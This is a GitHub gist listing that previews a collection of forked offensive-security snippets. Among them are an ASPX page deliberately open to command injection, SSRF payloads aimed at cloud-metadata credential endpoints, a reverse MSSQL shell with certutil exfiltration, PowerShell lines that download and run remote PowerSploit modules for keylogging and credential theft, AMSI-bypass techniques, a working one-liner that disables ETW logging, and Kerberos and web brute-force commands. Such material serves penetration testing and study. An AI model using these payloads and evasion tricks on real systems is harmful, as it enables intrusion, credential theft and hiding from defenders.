CalfCrusher / ping.aspx

Created January 11, 2023 15:12 — forked from stasinopoulos/ping.aspx

Simple ASPX application (vulnerable to OS command injections)

	<%@ Page Language="C#" Debug="true" Trace="false" %>
	<%@ Import Namespace="System.Diagnostics" %>
	<%@ Import Namespace="System.IO" %>
	<script Language="c#" runat="server">

	void Page_Load(object sender, EventArgs e){
	}

	string ExcuteCmd(string arg){
	ProcessStartInfo psi = new ProcessStartInfo();

CalfCrusher / kali-headless.md

Created January 27, 2023 22:32 — forked from xErik/kali-headless.md

Configuring Headless (no X, GUI) Kali, Running In VirtualBox

Kali Headless Mode Configuration

Disabling the GUI/X/Head

systemctl set-default multi-user.target
systemctl get-default # shows new default mode
reboot

CalfCrusher / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt

Created March 9, 2023 09:49 — forked from intrd/tutorial_bruteforce_cookies_csrf_burp_rewrite.txt

Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros

	## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
	# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	## Burp csrf-rewritting macro
	- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
	Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
	and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
	Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
	- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing

CalfCrusher / hash_examples.md

Created May 2, 2023 21:57 — forked from dwallraff/hash_examples.md

Hashcat hash types - https://hashcat.net/wiki/doku.php?id=example_hashes

Hashcat Example hashes

Unless otherwise noted, the password for all example hashes is hashcat

Hash-Mode	Hash-Name	Example
0	MD5	8743b52063cd84097a65d1633f5c74f5
10	md5($pass.$salt)	01dfae6e5d4d90d9892622325959afbe:7050461

CalfCrusher / cloud_metadata.txt

Created May 11, 2023 16:15 — forked from BuffaloWill/cloud_metadata.txt

Cloud Metadata Dictionary useful for SSRF Testing

	## IPv6 Tests
	http://[::ffff:169.254.169.254]
	http://[0:0:0:0:0:ffff:169.254.169.254]

	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

CalfCrusher / mandros.py

Created May 19, 2023 15:03 — forked from xassiz/mandros.py

Reverse MSSQL shell

	import sys
	import requests
	import threading
	import HTMLParser
	from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

	'''
	Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
	Author: @xassiz
	'''

CalfCrusher / In-memory PS injection.txt

Created May 30, 2023 17:53 — forked from chr0n1k/In-memory PS injection.txt

Some in-memory Powershell injection scripts

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1');

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1')

	#"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1')

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

CalfCrusher / amsi-bypass.md

Created October 7, 2023 15:07 — forked from D3Ext/amsi-bypass.md

All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

CalfCrusher / KillETW.ps1

Created October 7, 2023 15:52 — forked from tandasat/KillETW.ps1

Disable ETW of the current PowerShell session

	#
	# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
	# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
	# to bypass Suspicious ScriptBlock Logging for readability.
	#
	[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

CalfCrusher / kerberos_attacks_cheatsheet.md

Created October 15, 2023 10:57 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md

A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: